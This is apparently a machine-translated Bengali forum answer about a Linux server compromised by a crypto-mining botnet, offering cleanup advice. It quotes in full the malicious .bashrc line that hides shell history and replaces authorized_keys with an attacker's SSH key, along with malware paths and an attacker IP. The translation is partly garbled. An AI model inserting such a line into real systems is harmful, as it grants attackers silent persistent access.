আমার ক্ষেত্রেও একই ঘটনা ঘটেছিল এবং আমি গতকাল লক্ষ্য করেছি। আমি ফাইলটি যাচাই করেছিলাম /var/log/syslog
এবং এই আইপি (185.234.218.40) স্বয়ংক্রিয়ভাবে ক্রোনজব চালাচ্ছে বলে মনে হয়েছে।
আমি HTTP এ এটি পরীক্ষা করে দেখি ( https://phaismyipaddress.com/ip/185.234.218.40 ) এবং এর কিছু প্রতিবেদন রয়েছে। এই ফাইলগুলি ট্রোজান সম্পাদনা করেছিল:
- .bashrc
- .ssh / authorized_keys -র
আমি এটি শেষে পেয়েছি .bashrc
(যা প্রতিটি বার ব্যাশ খোলার পরে কার্যকর করা হয়):
set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~
এটি আপনার authorized_keys
ফাইলটি মোছা হচ্ছে , এটি এসএসএইচ কীগুলির একটি তালিকা যা কোনও পাসওয়ার্ড ছাড়াই সংযোগ করার অনুমতিপ্রাপ্ত। তারপরে, এটি আক্রমণকারীটির এসএসএইচ কী যুক্ত করে:
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr
তদতিরিক্ত, আমি এই ফোল্ডারটি পেয়েছি: /tmp/.X13-unix/.rsync
যেখানে সমস্ত ম্যালওয়্যার। এমনকি আমি একটি ফাইল, /tmp/.X13-unix/.rsync/c/ip
70,000 আইপি অ্যাড্রেস সম্বলিত একটি ফাইল পেয়েছি যা সম্ভবত অন্যান্য ক্ষতিগ্রস্থ বা নোড সার্ভার রয়েছে।
2 টি সমাধান রয়েছে: এ:
এক্সপোর্ট ব্যর্থ পাসওয়ার্ডের পরে আইপি ঠিকানাকে নিষিদ্ধ করে এমন একটি প্রোগ্রাম যা পোর্ট 22 এবং আপনার প্রয়োজনীয় খুঁজে পাওয়া যায় এবং ব্যর্থ 2ban সক্ষম করে ব্যতীত সমস্ত বহির্গামী সংযোগগুলি অবরুদ্ধ করে ফায়ারওয়াল যুক্ত করুন X
সমস্ত ক্রোন জব
ps aux | grep cron
হত্যা করুন:, তারপরে যে পিআইডি প্রদর্শিত হবে তাকে হত্যা করুন
আপনার পাসওয়ার্ডটি একটি সুরক্ষিত পাসওয়ার্ডে পরিবর্তন করুন
খ:
আপনার প্রয়োজন বা চান যে কোনও ফাইল বা ফোল্ডার ব্যাক আপ করুন
সার্ভারটি পুনরায় সেট করুন এবং উবুন্টু পুনরায় ইনস্টল করুন বা সরাসরি একটি নতুন ফোঁট তৈরি করুন
থম উইগার্স যেমন বলেছেন, আপনি অবশ্যই একটি বিটকয়েন মাইনিং বোটনেটের অংশ, এবং আপনার সার্ভারটির একটি ব্যাকডোর রয়েছে । পিছনের অংশে একটি পার্ল শোষণ নিয়োগ করে, একটি ফাইল এখানে অবস্থিত: এতে /tmp/.X13-unix/.rsync/b/run
( https://pastebin.com/ceP2jsUy ) রয়েছে
আমি খুঁজে পাওয়া সন্দেহজনক ফোল্ডারগুলি হ'ল:
পরিশেষে, এখানে পার্ল ব্যাকডোর সম্পর্কিত একটি নিবন্ধ রয়েছে: https://blog.trendmicro.com/trendlabs-security-inte होतेnce/outlaw-hacking-groups-botnet-observ-spreading-miner-perl-based-backdoor/
আশা করি এটি আপনার কাজে লাগবে।
.firefoxcatche
ফায়ারফক্সের সাথে সম্ভবত কিছু করার নেই - এটি কি কেবল বিটকয়েন মাইনার হতে পারে? এক্সিকিউটেবলগুলিকে ভাইরাসটাল আপলোড করার চেষ্টা করুন।